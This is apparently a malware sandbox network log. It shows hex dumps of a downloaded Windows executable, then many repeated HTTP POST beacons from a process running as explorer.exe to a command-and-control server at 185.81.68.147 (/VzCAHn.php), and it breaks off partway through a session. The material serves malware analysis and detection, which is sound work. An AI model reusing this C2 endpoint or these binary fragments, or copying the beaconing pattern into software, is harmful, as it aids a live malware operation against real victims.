                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983280897 CET1236INData Raw: 15 e3 5e 00 00 b9 88 13 00 00 ff 15 60 5e 00 00 e9 81 fe ff ff c7 44 24 44 00 00 00 00 c7 44 24 40 04 00 00 00 48 c7 44 24 20 00 00 00 00 4c 8d 4c 24 40 4c 8d 44 24 44 ba 05 00 00 20 48 8b 4c 24 38 ff 15 00 5f 00 00 8b 44 24 44 48 89 44 24 68 ff
                                                                                                                                                                                                                        Data Ascii: ^`^D$DD$@HD$ LL$@LD$D HL$8_D$DHD$h_HL$hLH_HD$XH|$XuHL$8c^HL$PX^3D$HD$HL$D+L$HHT$XHHLL$`DHHL$8s^t|$`vD$`L$HD$HH$
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983369112 CET1236INData Raw: 80 00 00 33 d2 48 8b 4c 24 60 ff 15 94 59 00 00 e9 14 06 00 00 48 c7 84 24 10 01 00 00 00 00 00 00 48 8b 84 24 f8 03 00 00 48 83 c0 10 48 c7 44 24 20 00 00 00 00 41 b9 08 00 00 00 4c 8d 84 24 10 01 00 00 48 8b d0 48 8b 8c 24 20 01 00 00 ff 15 bf
                                                                                                                                                                                                                        Data Ascii: 3HL$`YH$H$HHD$ AL$HH$ ZHDZH$H3EH$UXHD$hH$H$ T$htA3HL$`XuHD$`HD$pHD$pHc@<HL$`HHH$H$@PD$ @A0
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983467102 CET1236INData Raw: 24 58 48 8b 8c 24 88 0a 00 00 48 03 c8 48 8b c1 48 89 84 24 88 0a 00 00 8b 84 24 84 0a 00 00 48 8b 8c 24 10 01 00 00 48 03 c8 48 8b c1 48 c7 44 24 20 00 00 00 00 41 b9 08 00 00 00 4c 8d 84 24 88 0a 00 00 48 8b d0 48 8b 8c 24 20 01 00 00 ff 15 e3
                                                                                                                                                                                                                        Data Ascii: $XH$HHH$$H$HHHD$ AL$HH$ UuA3HL$`dTXH$H0H$HHD$ ALHH$ }UH$@(H$`HHH$PH$PH$H$p
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983501911 CET1236INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 33 c0 83 f8 01 74 12 e8 6b fe ff ff b9 70 17 00 00 ff 15 c8 4f 00 00 eb e7 33 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc 48 83 ec 38 ff 15 be 51 00 00 85 c0 74 04 b0 01 eb 3b c7 44 24 20
                                                                                                                                                                                                                        Data Ascii: HL$H(3tkpO3H(H8Qt;D$ QHT$ HQt|$ tD$$D$$D$$2H8H8HRhHQHRHTHD$(D$ E3L33QP
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983537912 CET1236INData Raw: 20 00 00 00 00 45 33 c9 4c 8d 05 29 fd ff ff 33 d2 33 c9 ff 15 ff 4c 00 00 48 89 84 24 80 02 00 00 48 8b 84 24 80 02 00 00 48 89 84 24 70 02 00 00 41 b9 ff ff ff ff 41 b8 01 00 00 00 48 8d 94 24 60 02 00 00 b9 03 00 00 00 ff 15 a8 19 00 00 33 c9
                                                                                                                                                                                                                        Data Ascii: E3L)33LH$H$H$pAAH$`3K3H3DL$ LD$HT$HL$3HL$HD$iHL$HD$HL$WH3f$`H$bH3$p
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.103456020 CET1236INData Raw: 48 83 ec 28 8b 44 24 30 41 b9 04 00 00 00 41 b8 00 30 00 00 8b d0 33 c9 ff 15 1e 46 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc 48 83 ec 68 48 8d 05 c5 34 00 00 48 89 44 24 30 48 8d 05 31 35 00 00 48 89 44 24 40 c7 44 24 38 00 00 00 00 48 8d
                                                                                                                                                                                                                        Data Ascii: H(D$0AA03FH(HhH4HD$0H15HD$@D$8HD$HHD$ AE3HT$0HgHD$P|$Pu:D$(HD$8HD$ AE3HT$@HL$H9HD$PHL$HFHhHT$HL$H8HT$HHL$@bFD$ |$


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        6192.168.2.549727185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.235296965 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.355178118 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.880692959 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:23 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        7192.168.2.549733185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.110251904 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.233230114 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.561175108 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:25 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        8192.168.2.549739185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.799380064 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.919548988 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.243083954 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:27 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        9192.168.2.549744185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.469675064 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.592951059 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.905262947 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:29 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        10192.168.2.549746185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.160307884 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.280922890 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.759691954 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:30 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        11192.168.2.549752185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.985049963 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.106182098 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.444749117 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:32 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        12192.168.2.549758185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.672574043 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.792589903 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.293963909 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:34 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        13192.168.2.549764185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.549963951 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.669776917 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.168206930 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:36 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        14192.168.2.549769185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.391105890 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.510855913 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:38.860551119 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:38 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        15192.168.2.549771185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:39.094008923 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:39.213953972 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.571070910 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:39 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        16192.168.2.549777185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.799694061 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.922614098 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.402677059 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:41 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        17192.168.2.549783185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.625920057 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.745816946 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.083803892 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:43 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        18192.168.2.549789185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.312973022 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.432805061 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.743634939 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:44 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        19192.168.2.549794185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.971731901 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:46.091593027 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.424607038 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:46 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        20192.168.2.549796185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.658782959 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.779369116 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.104778051 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:48 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        21192.168.2.549802185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.339306116 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.459721088 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:50.951261044 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:49 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        22192.168.2.549808185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.189982891 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.310628891 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.646693945 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:51 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        23192.168.2.549813185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.876112938 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
